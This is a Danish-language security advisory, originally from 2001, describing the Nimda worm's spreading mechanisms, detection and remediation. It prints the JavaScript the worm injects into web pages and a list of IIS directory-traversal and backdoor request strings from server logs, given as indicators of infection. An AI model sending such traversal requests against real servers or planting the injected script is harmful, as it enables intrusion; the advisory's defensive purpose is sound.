Af Anonym, 11/10/16
Artiklen blev oprindeligt publiceret den 19/9/2001
Kort fortalt:Nimda kendes også som Concept Virus (CV) v.5.. Denne nye orm spreder sig via flere forskellige mekanismer:
- Fra klient til klient via E-mail
- Fra klient til klient via åbne shares på nettet
- Fra WEB-server til klient, når man browser kompromitterede WEB-steder
- Fra klient til WEB-server via aktiv scanning og udnyttelse af fejl i MS IIS 4.0 / 5.0 directory traversal
- Fra klient til WEB-server via scanning efter bagdøre fra Code Red II eller Sadmind/IIS orme
Indledende analyser indikerer, at ormen ikke indeholder nogen destruktiv funktionalitet ud over modifikationen af WEB-filer til dens egen videre udbredelse.
Som et resultat af dette, kan der opstå Denial Of Service-lignende tilstande på grund af netværksscanning, samt spredning af Nimda via E-mail.
Beskrivelse:
Nimda rammer såvel Workstations med operativsystemet Microsoft Windows 95/98/ME/NT/2K Professional, som servere med operativsystemet Microsoft Windows NT og 2K.
Spredning via E-mail:
Denne orm spredes via E-mail som ved modtagelse indeholder en MIME (multipart/alternative) besked som består af to sektioner. Den første sektion er defineret som MIME type text/HTML, men indeholder ingen tekst, således at E-mailen fremstår uden indhold. Den anden sektion er defineret som MIME type audio/x-wav, men indeholder en base64-encoded vedhæftet fil, som hedder readme.exe. Denne er en binær, eksekverbar fil.
På grund af en sårbarhed ved MIME (automatic execution of Embedded MIME types), vil et hvilket som helst mail-program der køres på en Intel X86-platform, som bruger Microsoft Internet Explorer 5.5 SP1 eller tidligere (på nær IE 5.01 SP2) automatisk vise HTML-delen af mailen samt automatisk køre den vedhæftede fil, hvorved maskinen bliver inficeret med ormen. Derfor vil ormen på sådanne konfigurationer automatisk blive igangsat, når man åbner mailen eller anvender hurtigvisning (Preview) i oversigten.
E-mailen indeholdende Nimda kan kendes på følgende karakteristika:
- Teksten i emne-feltet varierer i størrelse, men synes altid at fylde mere end 80 karakterer.
- Indholdet i den vedhæftede, binære fil, varierer noget, hvilket gør det svært at genkende ormen alene på MD5-checksummen. Dog fylder koden altid 57344 bytes.
Berørte områder:
Inficerede klienter prøver at sende kopier af Nimda via E-mail til alle adresser fundet i Windows adressebogen.
Der søges efter adresser i .htm- og .html-filer i det lokale system. MAPI udnyttes også med den hensigt at finde endnu flere adresser i mail-programmets indbakke. Ethvert mailprogram som understøtter MAPI (Microsoft Outlook og Outlook Express inklusive), kan udnyttes til dette formål.
Nimda anvender sin egen SMTP server til at sende mail med, idet den bruger den gældende Name Server til at få en MX record.
Klient-maskinerne begynder også at scanne efter sårbare Microsoft Internet Information Servere (IIS). Nimda kigger efter bagdøre fra tidligere IIS-orme: Code Red II og Sadmind/IIS. Den forsøger også at udnytte IIS Directory Traversal sårbarheden.
Udvælgelsen af potentielle IP-adresser til angreb følger disse tilnærmede sandsynligheder:
- 50% af tiden, bliver adressen valgt, således at de to første oktetter er de samme
- 25% af tiden vælges adressen således at den første oktet er den samme
- 25% af tiden vælges tilfældige adresser
Den inficerede klient-maskine overfører en kopi af Nimda-koden til enhver server, som den måtte scanne og finde systemer modtagelige for ormen. Når den først kører vil ormen gennemsøge alle biblioteker (også dem som udbydes til netværket) og skrive en kopi af sig selv på disken med navnet README.EML.
Når et bibliotek indeholder WEB-filer (f.eks. .HTML eller .ASP) vil følgende javascript-kode blive tilføjet til disse filer:
script language=Javascript
windows.open(readme.eml, null, resizeable=no,top=6000,left=6000)
/script
Denne modifikation af filerne tillader yderligere udbredelse af ormen til nye klienter gennem en browser eller browsing i et udbudt netværksdrev.
Nimda vil udbyde det lokale c:\-drev til netværket, opretter en konto kaldet GUEST og tilføjer denne i grupperne Guests og Administrators. På denne måde kan andre computere på netværket tilgå alle lokale filer på drevet.
Inficering via browser:
Som en del af inficeringsprocessen modificerer Nimda-ormen alle WEB-relaterede filer, den kan finde (dette inkluderer blandt andet, men begrænser sig ikke til, filer med ekstension .htm, .html og .asp). Som et resultat vil en hvilken som helst bruger, der tilgår WEB-filerne via en browser, hente en kopi af ormen. Nogle browsere vil i værste fald selv eksekvere kopien, hvorved ormen inficerer systemet.
Udbredelse via filsystemet:
Nimda danner utallige kopier af sig selv (hvor den bruger README.EML) i alle biblioteker med skriveadgang (tillige de biblioteker som udbydes via netværket). Hvis en bruger på et andet system derefter vælger at kopiere en inficeret fil fra netværksdrevet med Windows Explorer, mens hurtigvisning (Preview) er slået til, kan systemet blive kompromitteret.
Identifikation af Nimda:
Under scanning producerer Nimda følgende linier i loggen for en WEB-server der lytter på port 80/tcp:
GET /scripts/root.exe?/c+dir
GET /MSDAC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c.. /..%5c../..%5c../..\xc1\x1c../..\xc1\x1c../..\xc1\x1c..\ /winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
Bemærk: De første fire linier i dette eksempel viser forsøg på at forbinde sig til bagdøren, som er efterladt af Code Red II. Den resterende del af loggen er forsøg på at udnytte Directory Traversal sårbarheden.
Omfang:
Uautoriserede brugere kan afvikle arbitrære kommandoer på maskiner som kører ikke-opdaterede versioner af IIS. Hosts som er blevet kompromitteret er også i højrisikogruppen for deltagelse i angreb på andre Internet-sites.
Den høje frekvens af scanninger som Nimda forårsager, kan resultere i tab af båndbredde på grund af DoS (Denial of Service) tilstande.
Løsninger:
Anbefalinger for administratorer af IIS-servere:
For at finde ud af om dit system er kompromitteret, skal man kigge efter følgende:
- Tilstedeværelse af root.exe. (indikerer at systemet har været kompromitteret af Code Red II eller Sadmind/IIS)
- I roden af alle drev (C:\, D:\ osv.) samt i alle foldere med Web-materiale er forekomsten af admin.dll, readme.dll eller .eml-filer indikation af inficering med Nimda
Den eneste måde at slippe helt af med de usikkerheder som et kompromitteret system giver, er at formatere systemets drev og geninstallere softwaren fra et ukompromitteret medie. Yderligere efter reinstallation, skal systemet opdateres med de nyeste patches. Det anbefales at gøre dette, mens systemet ikke er koblet til nettet.
En samlet patch som kan afhjælpe samtlige IIS-relaterede sårbarheder som bliver udnyttet af NIMDA-ormen, kan hentes fra Microsofts Security Bulletin ms01-044.
Anbefalinger til brugere:
Hvis man anvender en sårbar version af Internet Explorer, anbefales det at installere patch for Automatic execution of embedded MIME types.
Desuden anbefales det at installere et antivirusprogram med den seneste opdatering fra leverandørens hjemmeside.
Lad være at åbne ukendte vedhæftede filer i E-mails. Nimda modtages som vedhæftet fil ved navn README.EXE. Brugere skal ikke åbne denne vedhæftede fil.
Slå javascript fra, da slutbrugersystemer kan inficeres med Nimda ved at browse hjemmesider som ligger på inficerede servere.
Kilder:
Symantec Security Response
CERT CC